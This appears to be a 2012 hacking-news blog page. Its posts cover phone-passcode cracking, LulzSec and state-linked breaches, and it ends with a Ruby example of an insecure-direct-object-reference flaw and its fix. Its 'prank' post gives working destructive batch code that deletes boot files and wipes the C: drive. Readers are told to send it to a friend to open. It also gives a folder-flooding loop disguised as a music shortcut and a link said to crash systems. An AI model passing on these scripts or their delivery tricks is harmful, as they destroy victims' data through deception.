Friday, March 30, 2012

iPhone Password Hacking is Easy



That four-digit passcode you have installed on your iPhone might slow snoops down, but it won't stop them. Forbes is reporting that in some cases, it takes less than two minutes to crack the code.
Micro Systemation is a Swedish company that sells software capable of skirting privacy controls on iOS and Android gadgets. Law enforcement and military agencies use this software in order to access data on devices used by criminal suspects.
In a video (see below) Micro Systemation is able to hack an iPhone in just seconds. Granted, the password wasn't very complicated – it was "0000."
Forbes explains that the hack is possible through a Micro Systemation application called XRY, which deciphers the phone's password, siphons its data to a computer, and decrypts it in order to gain data like GPS logs, call history, contacts, text messages, keystrokes, and so forth. XRY works a lot like a jailbreak, Forbes said. The Micro Systemation team doesn't look for backdoor vulnerabilities made by the phone's manufacturer, but rather weaknesses in the software.
"Every week a new phone comes out with a different operating system and we have to reverse engineer them," Micro Systemation's marketing director Mike Dickinson told Forbes. "We're constantly chasing the market."
Dickinson told Forbes that his company sells products that are able to breach iPhone and Android security in 60 countries. It provides software to 98 percent of the U.K.'s police departments and also sells to U.S. police departments and the FBI. However, its largest client is the U.S. military, Forbes said.
As the smartphone business grows worldwide, so does Micro Systemation's business.
"It's a massive boom industry, the growth in evidence from mobile phones," Dickinson said. "After twenty years or so, people understand they shouldn't do naughty things on their personal computers, but they still don't understand that about phones. From an evidential point of view, it's of tremendous value… if they've done something wrong."

Lulzsec Hacks Military Dating Site

LulzSec, the Anonymous offshoot that hacks for fun ("for the lulz"), disbanded last June after 50 days of high profile hacks, also known as the 50 Day Cruise.
But the jokers appear to be making a comeback, perhaps in order to restore the confidence of its followers after it was revealed that former ringleader Sabu helped the FBI locate and arrest former teammates. 
On Tuesday, hackers calling themselves "LulzSec Reborn" posted onto Pastebin the email database, including names and addresses, of every employee at San Jose-based IT firm, CSS Corp. 
Preceding this, on Sunday the group hacked into military dating website, militarysingles.com. It dumped the names, emails, and passwords of around 170,000 members, many with .gov and .mil addresses. The hackers also defaced a page with its signature Nyan Cat after the site's parent company told Data Breaches there was "no actual evidence" of a breach. 
The motivations behind these two targets are unclear at this point, but as I mentioned earlier, the original LulzSec unit hacked for fun.
As Sophos' Graham Cluley noted over at Naked Security, "Of course, on the internet, anyone can claim to be whatever they want and so it's not particularly surprising to see that it was a group calling itself LulzSec Reborn that posted a message on PasteBin announcing the hack of MilitarySingles.com."
To illustrate this point, a viral video about an April 1st rebirth from LulzSec was discredited by LulzSec Reborn's Twitter account, as "bullshit."
Earlier this month, the FBI charged six members of Anonymous/LulzSec who were based in the U.K., New York, Chicago, and Ireland. In a stunning revelation, it was disclosed that former LulzSec ringleader Sabu (real name: Hector Xavier Monsegur), a 28-year-old single father living in the Lower East Side of Manhattan, New York City, had served as an informant for several months. For a rundown of all the charges, see FBI Takes Down LulzSec Hackers, With Help From Inside.


Friday, March 23, 2012

How to Hack Someone's Computer




As the digital world becomes more and more complex, the need for deliberate, thorough security grows. Yes, we know, you’ve got everything “password protected.” And yes, not every hacker is like the guys in the movies who are able to keyboard their way through complicated layers of encrypted, password-protected security faster than a gamer boots up a new version of Call of Duty.

Below is a list of the 10 most-favored passwords. If yours is there, you ought to A) think about changing it, or B) post your Social Security, credit card, and bank account numbers, and any other private information you think might be useful on your Facebook page.

  1. Password1
  2. letmein
  3. Secure1
  4. Abc123
  5. 123456
  6. monkey
  7. Facebook1
  8. passworD
  9. link2012
  10. (your first name)

Oh, and though it’s from an older, non-digital source, it would be well to remember the words of Confucius when setting your passwords: “When in a state of security, do not forget the possibility of ruin.”


Chinese Hack Microsoft


Chinese hackers apparently gained access to information about vulnerabilities in Microsoft’s operating systems before a company patch was released, and security researchers are worried the leak came directly from Microsoft’s secured website.
The Microsoft Security Response Center states the Microsoft Active Protections Program is a program for security software providers that “gives members a head start to reproduce the vulnerabilities and program [anti-hacking] tools in advance of Microsoft’s official security updates.”
The site states, “The amount of time between the release of a Microsoft security update and the release of exploit code (vulnerability) for that update continues to shorten. MAPP gives security software providers early access to vulnerability information.”
On March 13, Microsoft issued critical security update MS12-020 for its Windows operating systems.

Sunday, March 18, 2012

Hacking GSM Mobile Network in India



A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated.
Four founding members of a company called Matrix Shell say they have worked out a way to hack into Indian GSM phone numbers and make calls from them. They were able to use the unique SIM card number, called the International Mobile Subscriber Identity (IMSI), of their target victims.
Using firmware called Osmocom, with software they wrote running on it, they successfully hacked into GSM phones at a recent security conference.

Saturday, March 17, 2012

5 Simple Hacks to Prank your friends

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a JavaScript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

http://tiny.cc/ibJUN


2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Now Save it as a .bat file.

This should shut down the person's computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T GET YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friend's computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q


Paste it in Notepad and save it with the extension .cmd or .bat


3. Make over 1,000 folders in few seconds


Here I will teach you a simple prank that will make an unlimited number of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top 


@echo off stops the commands from being displayed, so the window appears blank while it is actually making hundreds of folders.
md %random% is the command that creates folders with random names.
goto top returns to the label :top, making an infinite loop.


2. Save it as 1000folders.bat


3. After that you will get an icon that looks as shown below


People are probably not going to click on an icon that looks like this picture, so to make it better (funnier and easier to prank people with), make a shortcut to it

4. Right click on icon and click Create Shortcut


5. Right click on the shortcut and click Properties, then click on Change Icon and rename the icon


Tell the person that you found the music they wanted and downloaded it on their computer; that way they will think it's a shortcut to the music and they will click on it. Then they will think it's loading, so they won't exit right away. When they finally realize it's not going to load, or so many errors have come up that they realize something's wrong, it will be too late. Also, just something to know: it's impossible to delete them using cmd; you HAVE to find all of them and delete them manually…


4. Microsoft Word Prank 

Here, I will show you a great Microsoft Word prank that will frustrate the victims very much: whenever they type a certain word, another word appears! This prank is great for offices and schools.

1. Launch Microsoft Word

2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace, type a really common word such as the, and, a, I, you, etc. In the space that says With, type in a crazy word such as fdgfdhkihyob45, whatever you want! Then click on Add



5. Cool Windows Prank 

This will make it to where your friend cannot click on anything on the screen.

1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.

3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it. When you click on the “icons”, nothing will happen!

Originally Appeared on http://www.hackpconline.com/2010/05/painfully-computer-pranks.html

Friday, March 16, 2012

How to hack cell phones/ mobiles ?

#1 -- Physical Access to the Phone -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account.

#2 -- Hacking Email, Twitter and Apps -- Most celebrities are hacked through email, Twitter and other accounts that they use on their phones. This is what happened to Scarlett Johansson, Kreayshawn, Mila Kunis and Christina Aguilera, among others -- and it may also be the reason for the more recent hacks on Heather Morris and Christina Hendricks.

#3 -- Social Engineer the Phone Company -- In 2005, hackers stole nude pictures of Paris Hilton by getting access to her T-Mobile Sidekick II, a precursor to today's smartphones. How did they do it? They impersonated a T-Mobile support tech over the phone and tricked T-Mobile employees into giving them access to the carrier's intranet site that contained a list of user accounts, which allowed them to reset the password to her account and steal photos and contacts. Today, there's still a risk hackers could reset accounts or permissions by conning the phone company, but it's more likely they'll simply target a person's accounts directly online.

#4 -- Wi-Fi Spies -- Movie stars do a lot of traveling, and while they're roaming about they're often connecting their phones to open Wi-Fi networks -- whether it's at the airport, hotel or Starbucks. This puts them at greater risk of being hacked. Using public Wi-Fi puts all of your online accounts, Internet searches, emails and usernames/passwords out in the open where they can be read, copied and hacked by any person with moderate computer skills. In fact, there are special tools available online that do this.

#5 -- Spyware -- Stars who spend a lot of time using open Wi-Fi and chatting with friends or followers on social networks and clicking on shared links are also at risk of spyware. Spyware is malicious software that can infect your phone in order to record the things you type -- like usernames and passwords -- and it can also be used to steal items from your phone, like photos, contacts and banking data. "FakeToken" is one example of spyware that is currently being found on some Android phones. There's a good chance some celebrity phones have been infected by spyware.


Thursday, March 15, 2012

BBC hack attack linked to the Iranians


The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country.
The BBC has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator.
The global media company believes a distributed denial of service (DDoS) attack was the reason for its outlets across Persia falling down on 1 March, leaving citizens unable to view BBC TV channels or listen to the radio broadcasts.

Wednesday, March 14, 2012

Electronic voting system hacked


(AFP Photo / Joe Raedle)
When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days.
The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online ballot system could sustain a cyber attack. If you’re wondering why they never followed through, it is because the government is going to need a lot more time with this one.
More Info:
http://rt.com/usa/news/hack-voting-system-dc-593/ 

Chinese Hack BAE to learn about F-35

This plane will have taken more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way? 
More Info on:
http://www.emptywheel.net/2012/03/14/bae-f-35-hack-confirmed/?utm_source=rss&utm_medium=rss&utm_campaign=bae-f-35-hack-confirmed 

Tuesday, March 13, 2012

Control an Arduino from your Android device using a cheap bluetooth module

Check out this new instructable which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay.

This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see: http://code.google.com/p/android-scripting/ 

Monday, March 12, 2012

Daily Attack Round Up: Anonymous hacks Vatican and 'The Consortium' Attacks Porn Site

The following two hacking attacks have been reported in the news today.

- Anonymous has hacked the Vatican for a second time. The website for the Catholic Church, vatican.va, is currently down. Unlike the first hack, which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio, and today’s attack is possible because of a backdoor Anonymous created for itself the first time around.

- A group of hackers calling themselves The Consortium is claiming to have accessed user data of over 70,000 users of the pornography website Digital Playground, according to Adult Video News.

In addition here is a funny take on the recent Ruby on Rails vulnerability https://lwn.net/Articles/485325/

For a more serious assessment, check out the following post from Errata Security on the attack, which describes the vulnerability as follows:
For those who don’t speak Russian or Ruby-on-Rails, I thought I’d translate the recent GitHub hack controversy.
The underlying issue is an “Insecure Direct Object Reference”, #4 on the OWASP Top 10 list of most important web-application vulnerabilities. It means that a hacker can change what's in the website database without having permission.
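
The Insecure Direct Object Reference named in the quoted post, shown as an added example that is not from either blog post or from any real application: a handler that trusts the record id in the request, beside one that checks ownership before writing. The table, record fields, user names and function names are all constructed for illustration, and plain Ruby stands in for a Rails controller.

```ruby
# Added illustration; the rows, ids, owners and titles are constructed.
Record = Struct.new(:id, :owner, :title)
class NotFound < StandardError; end

# In-memory stand-in for the website's database table.
def new_table
  { 1 => Record.new(1, "alice", "alice's notes"),
    2 => Record.new(2, "bob", "bob's notes") }
end

# The id arrives as a request string; anything non-numeric finds nothing.
def find_row(table, id)
  table[Integer(id, exception: false)]
end

# Vulnerable: the request's id is a direct reference to the row, and
# current_user is never compared with the row's owner.
def update_title_insecure(table, current_user, params)
  record = find_row(table, params[:id])
  raise NotFound if record.nil?
  record.title = params[:title]
  record
end

# Hardened: the write happens only when the row belongs to the session user.
# Missing rows and other users' rows raise the same error, so the response
# does not reveal which ids exist.
def update_title_checked(table, current_user, params)
  record = find_row(table, params[:id])
  raise NotFound if record.nil? || record.owner != current_user
  record.title = params[:title]
  record
end

# Replays one request (bob logged in, id of alice's row) against both handlers.
def demo
  request = { id: "1", title: "changed by bob" }
  insecure, checked = new_table, new_table
  update_title_insecure(insecure, "bob", request)
  rejected = begin
    update_title_checked(checked, "bob", request)
    false
  rescue NotFound
    true
  end
  { insecure: insecure[1].title, rejected: rejected, checked: checked[1].title }
end
```

The ownership test belongs on the server at the point of the write; hiding or obscuring ids in the page does not replace it.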